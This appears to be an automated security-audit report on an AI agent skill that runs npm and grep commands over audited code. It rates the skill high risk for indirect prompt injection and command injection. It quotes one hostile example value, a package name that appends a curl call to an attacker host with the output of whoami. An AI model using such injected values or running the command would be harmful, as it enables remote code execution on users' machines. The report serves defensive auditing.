security-audit
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, REMOTE_CODE_EXECUTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to run shell commands using variables derived from the files being audited.
  - Evidence: In Phase 1.5.1, the command `npm view <package-name> version` uses `<package-name>` from `package.json`.
  - Vulnerability: If a malicious codebase contains a package name like `lodash; curl http://attacker.com/$(whoami)`, the agent will execute the injected command when performing the audit.
- [REMOTE_CODE_EXECUTION] (HIGH): The lack of sanitization for untrusted inputs (Indirect Prompt Injection) enables remote code execution.
  - Ingestion points: `package.json` (dependency names), project files (content via grep).
  - Boundary markers: None. The instructions tell the agent to interpolate values directly into shell strings.
  - Capability inventory: `npm view`, `pnpm info`, `grep`, `git ls-files`, `test -f`.
  - Sanitization: Absent. There are no instructions to escape or validate the strings before shell execution.
- [DATA_EXPOSURE] (LOW): While intended for auditing, the skill identifies and collects sensitive secrets (API keys, tokens). There is no evidence of exfiltration in the current script, but the collection of these secrets increases the risk profile of the agent's environment.
Recommendations
- AI detected serious security threats
Audit Metadata